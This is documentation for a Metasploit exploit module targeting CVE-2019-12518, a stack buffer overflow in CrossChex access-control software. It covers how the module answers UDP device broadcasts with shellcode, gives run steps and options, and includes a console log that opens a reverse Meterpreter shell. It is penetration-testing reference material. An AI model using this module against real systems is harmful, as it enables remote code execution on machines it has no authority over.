## Introduction

CrossChex is a personnel identity verification, access control, and time
attendance management system compatible with Windows 7,8 & 10. It uses
UDP broadcasts to identify and connect with Access Control devices on a
network. The code used to handle a response from an Access Control
device is vulnerable to a Stack Buffer Overflow attack on CrossChex
versions `Crosschex Standard x86 <= V4.3.12`. Tracked as CVE-2019-12518,
and as such permits arbitrary code execution.

The code used to overflow the Stack Buffer and code an attacker wishes
to be executed as a result of the exploit are sent in a single UDP
packet as a response to the CrossChex broadcast. As both the exploit and
the payload must be contained inside a single UDP packet, an exploit has
a maximum size of `8947 Characters`.

This module exploits CVE-2019-12518 by listening for a CrossChex "new
device" broadcast for a given number of seconds (`TIMEOUT`). It then
responds with a UDP packet containing shellcode for both the Buffer
Overflow exploit and the attacker's chosen payload. The `Space` payload
option ensures no payload of too large a size is used to ensure
successful exploitation. If a broadcast is not detected within the given
`TIMEOUT`, the module exits with a warning.

## Verification Steps

1. Start `msfconsole`
2. `use windows/misc/crosschex_device_bof`
3. `set LHOST vboxnet0`
4. `run`
5. Open CrossChex
6. Navigate to Device > Add
7. Select `Search`
8. Verify payload executes correctly

## Options

1.  `TIMEOUT` Seconds module waits for broadcast, defaults to `1000`.
2.  `CHOST`. Address UDP packet response is sent from. Defaults to `0.0.0.0`.
3.  `CPORT`. Port UDP packet response is sent from. Defaults to `5050` as CrossChex expects communication from this port.

## Compatible Payloads

Any basic x86 windows payload.

## Payload Options

As above.

## Scenarios

```
msf5 exploit(windows/misc/crosschex_device_bof) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] CrossChex broadcast received, sending payload in response
[*] Payload sent
[*] Sending stage (180291 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49160) at 2020-02-10 16:21:13 +0000

meterpreter > ls
Listing: C:\Program Files\Anviz\CrossChex Standard
==================================================
...
```

## References

1. <https://cvedetails.com/cve/CVE-2019-12518>
2. <https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html>
3. <https://www.exploit-db.com/exploits/47734>
